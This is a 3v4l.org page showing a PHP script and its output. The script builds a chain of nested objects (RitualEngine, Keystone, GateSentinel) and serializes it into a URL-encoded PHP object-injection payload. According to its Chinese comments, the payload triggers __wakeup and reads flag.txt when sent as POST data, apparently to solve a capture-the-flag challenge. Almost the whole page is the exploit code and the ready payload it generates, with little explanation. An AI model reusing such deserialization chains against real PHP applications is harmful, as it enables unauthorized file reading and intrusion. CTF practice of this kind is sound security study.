3v4l.org

run code in 500+ PHP versions simultaneously
<?php class RitualEngine { protected $settings; public $target; public $callback; } class Keystone { public $center; } class GateSentinel { public $object; public $tool; } // 1. 最内层 RitualEngine D:负责最终读取flag.txt $D = new RitualEngine(); $D->target = 'flag.txt'; $D->callback = null; // 用不到 // 2. RitualEngine C:callback序列化保存 [D, 'view'] $C = new RitualEngine(); $C->callback = serialize([$D, 'view']); // 3. Keystone K:center指向C $K = new Keystone(); $K->center = $C; // 4. GateSentinel B:object随意,tool['blade']指向K $B = new GateSentinel(); $B->object = 'nothing'; // 不含flag, .. , etc $B->tool = ['blade' => $K]; // 5. 最外层 GateSentinel A:object指向B,触发__wakeup $A = new GateSentinel(); $A->object = $B; // 生成payload $payload = serialize($A); echo urlencode($payload); // 输出后可用作POST data参数 ?>
Output for 8.3.0 - 8.3.30, 8.4.1 - 8.4.18, 8.5.0 - 8.5.3
O%3A12%3A%22GateSentinel%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A12%3A%22GateSentinel%22%3A2%3A%7Bs%3A6%3A%22object%22%3Bs%3A7%3A%22nothing%22%3Bs%3A4%3A%22tool%22%3Ba%3A1%3A%7Bs%3A5%3A%22blade%22%3BO%3A8%3A%22Keystone%22%3A1%3A%7Bs%3A6%3A%22center%22%3BO%3A12%3A%22RitualEngine%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00settings%22%3BN%3Bs%3A6%3A%22target%22%3BN%3Bs%3A8%3A%22callback%22%3Bs%3A115%3A%22a%3A2%3A%7Bi%3A0%3BO%3A12%3A%22RitualEngine%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00settings%22%3BN%3Bs%3A6%3A%22target%22%3Bs%3A8%3A%22flag.txt%22%3Bs%3A8%3A%22callback%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22view%22%3B%7D%22%3B%7D%7D%7D%7Ds%3A4%3A%22tool%22%3BN%3B%7D
preferences:
246.9 ms | 740 KiB | 4 Q